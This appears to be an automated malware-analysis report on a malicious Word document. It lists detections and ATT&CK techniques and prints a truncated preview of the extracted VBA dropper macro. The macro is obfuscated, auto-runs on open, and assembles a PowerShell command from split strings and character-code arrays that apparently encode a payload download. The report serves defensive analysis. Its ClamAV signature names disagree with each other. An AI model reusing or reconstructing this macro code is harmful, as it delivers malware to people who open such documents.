Risk Score: 242 (MALICIOUS)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro includes an AutoOpen function and a call to Shell(), indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6592510-0' further supports its malicious nature as a dropper. The macro's obfuscated string concatenation suggests it is assembling commands or URLs for payload delivery.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6592505-0 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6592505-0
- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10936 bytes |

SHA-256: 01534ac41ab46e120b0d000a9fd8fb972f3698ca55b7c9803080df09a608aceb

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "VzXlUfjBWuCDv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "YNnqLIOdSZZ"
Function wSRQpYrvX()
On Error Resume Next
UWbbH = mTIAji
oGWMB = Sin(33136)
afAHT = CDate(18198)
LInZau = 4322
VwtAU = 46950
qwNEo = 44620
vhuMjm = "Hell " + " . " + Chr(40) + Chr(40) + "Va" + "ri" + "Abl" + "e '*M" + "dR" + "*'" + Chr(41) + ".nAmE" + "[3,11,2]" + "-j" + "OIn''"
aVmXw = WcaGjf
jiErj = Sin(54080)
AaiTTD = CDate(6330)
QwNRPj = 40509
MwUNP = 9198
NlniND = 32066
NNOKSS = Chr(41) + Chr(40) + "-j" + "OIN" + Chr(40) + Chr(40) + " 44 " + ", " + "96 " + ", " + "68" + ", 70 ," + "53, 10" + "2,109,"
CdEvNY = JifWw
jYBnGv = Sin(5102)
fjScJ = CDate(38993)
AjiqDM = 49775
ujNNm = 92522
BrvWhl = 25309
OkafqpkzNB = " 12" + "7,37" + " ,103" + ",106" + " ,9" + "8," + "109, 10" + "7 , 12" + "4, 4" + "0 "
VbMmH = ribcja
jGEzsA = Sin(8480)
MtIuUo = CDate(95897)
ojGiws = 67072
pPJDj = 19033
iiqwz = 56563
ERJWVo = ",70,1" + "09,124 " + ",3" + "8 ,95" + " , 10" + "9,1" + "06 ,75 " + ",100" + ", 97 ,1" + "09,10"
zOSiGR = GzzKb
mjkiqS = Sin(95919)
hZYukC = CDate(93870)
zctaKz = 31667
nEJcrY = 18131
fnZFw = 43126
IMjFECfFZNr = "2,124, 5" + "1 ,4" + "4,123" + " , 98,78" + ",53 ,4" + "7 " + ",96 ,124" + " , 124 ," + " 120," + " 5" + "0 ,"
LbTwu = qmhIh
owVFo = Sin(72122)
OYHWT = CDate(5649)
dVTUp = 38317
sfZbM = 70866
OPblF = 63923
hPqFbjYqp = " 39 ," + " 39 ," + "127 ,12" + "7,127" + " ,38,10" + "0, 108," + "111" + ",122,10" + "5 " + ", 120,9" + "6,9" + "7, 107,"
FBkNnf = pmzHOn
sipJC = Sin(49012)
wlsBFq = CDate(48158)
rmrmC = 65207
qUPmi = 71288
rQbTw = 3998
zBwwur = " 108" + " , 10" + "9, " + "123 ," + "97,111 " + ",102 ," + " 3" + "8 ," + " 107 ," + "103,101 "
SGfhO = UbJubw
hOdBX = Sin(36671)
DXrUP = CDate(32425)
HOEPHz = 42117
jSqLbE = 24118
JwLNh = 90600
NwlkiUIb = ",39" + ", 120,7" + "1 , 122" + ", 75 ,10" + "6 ,76 " + ", 39,7" + "2,9" + "6 ," + " 124,12" + "4 ," + "120"
tBZEq = APUGKU
fwwVO = Sin(69228)
MDzjnX = CDate(76479)
sKPci = 96478
voWNfO = 35586
tuRZZ = 70104
bjbHfi = " , 50,39" + ", " + "39 ," + " 12" + "7,127 ,1" + "27 ,38," + " 98, " + "102, 1"
pDwLVF = MYcNaj
CkRvbm = Sin(13265)
XCOhjq = CDate(46778)
kKuwX = 96271
cszOH = 71410
IoGkG = 64935
RWzzwFdJ = "27 , " + "62, 62" + ",48 ,38" + ", 107,1" + "03 ,10" + "1," + " 39,"
MQQfMK = wOUuK
SCGIh = Sin(92875)
iLGuk = CDate(42441)
ZwEfc = 41554
VYAXE = 78522
KSwzQM = 33818
MNITT = " 122," + " 73, 7" + "3 " + ", 70" + ",123 " + ", 101,79" + ", 49 ," + "39 , " + "72 ,"
wSRQpYrvX = vhuMjm + NNOKSS + OkafqpkzNB + ERJWVo + IMjFECfFZNr + hPqFbjYqp + zBwwur + NwlkiUIb + bjbHfi + RWzzwFdJ + MNITT
OqUvQ = Sin(38923)
ANmjk = 87843
nqWcvw = 41737
stdLOm = CDate(92044)
zHOPE = qsPIIV
iLOlcr = 9666
End Function
Function UtPPP()
On Error Resume Next
CXjNM = Sin(75503)
mPsaow = 2462
zfqBrs = 70375
GwJfAF = CDate(39670)
soTKQ = nImUjB
naNKP = 43197
QZoQLdNpK = "96" + " ,124 ," + "124, 12" + "0, " + "50, 3" + "9 ,39 " + ",127 ,12" + "7 ,127 ," + "38 , 108" + " , 97 " + ", 107" + ", 96"
vzMmXX = Sin(13498)
uFujw = 78719
AkVmf = 12306
lDjOH = CDate(56750)
QZcJDM = SSYGaF
nToiM = 38243
ocqzwwlzNX = " ,126, " + "125" + " , 124," + " 105, 97" + " ,107" + ", 96 ," + " 9" + "7 ," + "102," + " 9" + "6 ,"
HQvpJr = Sin(19515)
HufOKG = 73234
kuzLnJ = 55313
CIrSi = CDate(63284)
BlVOP = GWYGCX
MUCiH = 62276
OUIJCwCF = " 38, 97" + ",10" + "2 ," + "110 ," + "10" + "3 ,39" + ", 68,71"
hohBi = Sin(68589)
IFGVv = 49725
ZQODDj = 79138
QFVDMt = CDate(65465)
jCZDVH = JaGMiP
KMNiB = 37419
UMHWw = " ,76" + " , " + "59,10" + "6," + "101" + ",56" + ", 39 ,72"
rNozov = Sin(4547)
FzRCzs = 86607
GGrfID = 74137
GEGEfN = CDate(82648)
tGcHmL = RXwCtR
dkYSwH = 17333
WTjQYQQY = ", 96" + ",1" + "24, 124," + "120 , 5" + "0 , 39,3" + "9,127,1" + "27" + ", 127" + ", "
jGCLQC = Sin(311 ... (truncated)
```